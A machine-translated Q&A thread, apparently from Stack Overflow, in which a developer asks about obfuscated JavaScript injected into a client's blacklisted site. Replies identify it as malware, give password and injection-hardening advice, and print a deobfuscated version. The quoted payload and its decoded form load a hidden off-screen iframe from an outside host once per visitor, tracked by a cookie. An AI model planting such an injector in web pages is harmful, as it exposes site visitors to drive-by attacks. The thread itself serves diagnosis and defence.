2013-08-21 72 views
0

我在大約一年半的時間裏開發了一個網站。它是非常基本,簡單的html和很少的javascript.But突然客戶告訴我,他的網站是黑名單,在谷歌它顯示「可能會損害您的計算機...「msg.I查看網站的查看源,並注意到一些額外的腳本在那裏。我將它升級到html5,並要求他刪除所有以前的文件並放入新的文件。這很好,並從黑名單中清楚地表明。現在出於好奇,我檢查了網站,在訪問「url not found」消息出現在一個角落時(僅第一次),並且在源代碼中有一些額外的腳本,像是,我只是從源代碼複製它。這個腳本是什麼?惡意軟件?

sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:71:62:64:5f:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:62:64:5f:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:71:62:64:5f:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:69:60:5c:6b:58:6d:58:6a:25:5a:66:64:26:4d:6e:71:5d:69:5e:44:42:25:67:5f:67:1e:32:4:1:17:71:62:64:5f:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:71:62:64:5f:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:2b:27:2d:1e:32:4:1:17:71:62:64:5f:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:2b:27:2d:67:6f:1e:32:4:1:17:71:62:64:5f:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:2b:27:2d:67:6f:1e:32:4:1:17:71:62:64:5f:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:2b:27:2d:1e:32:4:1:17:71:62:64:5f:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:2b:27:2d:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:71:62:64:5f:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:71:62:64:5f:53:1e:17:5a:63:58:6a:6a:34:53:1e:71:62:64:5f:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:71:62:64:5f:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:71:62:64:5f:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:62:64:5f:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");}w=f;s=[];for(i=22-20-2;-i+1406!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)} 

我不知道什麼是這?是它的一些惡意軟件還是什麼?如果是某種惡意軟件,我該怎麼辦,如何預防呢?我怕,如果它要再次被列入黑名單。

任何想法或意見,將不勝感激提前

+1

看起來像網站已被破壞..看看這個(幾乎)相同:http://stackoverflow.com/questions/16264707/opencart-ajax-json-response-unknown-characters – vidario

+0

@vidario感謝您的回覆...接下來要做什麼?如何防止它繼續發生? – user1187405

回答

1

感謝證實,它是惡意軟件 - 見下面的鏈接。似乎是一個妥協的管理員密碼。首先改變這一點。

它是一個WordPress的網站?我聽說過Better WP security plugin的好東西,但我對它並不太熟悉。

如果不是WordPress的 - 看到你說的「簡單的HTML,小javascript」檢查任何形式的SQL注入可能性等,更改FTP密碼。

祝你好運!

Limeworks.org malware - Threat Report

+0

非常感謝你的參考。像是同類的代碼.BTW它不是一個WordPress的網站。 – user1187405

0

反混淆後,這是你得到的代碼:

function zkmh09() { 
var static='ajax'; 
var controller='index.php'; 
var zkmh = document.createElement('iframe'); 

zkmh.src = 'http://rietavas.com/VwzfrgMK.php'; 
zkmh.style.position = 'absolute'; 
zkmh.style.color = '406'; 
zkmh.style.height = '406px'; 
zkmh.style.width = '406px'; 
zkmh.style.left = '1000406'; 
zkmh.style.top = '1000406'; 

if (!document.getElementById('zkmh')) { 
document.write('<p id=\'zkmh\' class=\'zkmh09\' ></p>'); 
document.getElementById('zkmh').appendChild(zkmh); 
} 
} 
function SetCookie(cookieName,cookieValue,nDays,path) { 
var today = new Date(); 
var expire = new Date(); 
if (nDays==null || nDays==0) nDays=1; 
expire.setTime(today.getTime() + 3600000*24*nDays); 
document.cookie = cookieName+"="+escape(cookieValue) 
+ ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : ""); 
} 
function GetCookie(name) { 
var start = document.cookie.indexOf(name + "="); 
var len = start + name.length + 1; 
if ((!start) && 
(name != document.cookie.substring(0, name.length))) 
{ 
return null; 
} 
if (start == -1) return null; 
var end = document.cookie.indexOf(";", len); 
if (end == -1) end = document.cookie.length; 
return unescape(document.cookie.substring(len, end)); 
} 
if (navigator.cookieEnabled) 
{ 
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); 

zkmh09(); 
} 
} 

,你可以看到它創建一個iframe元素併發送一個Ajax請求http://ri *** vas.com/Vwz *** MK.php頁面。還有另外兩個功能來設置和獲取cookie。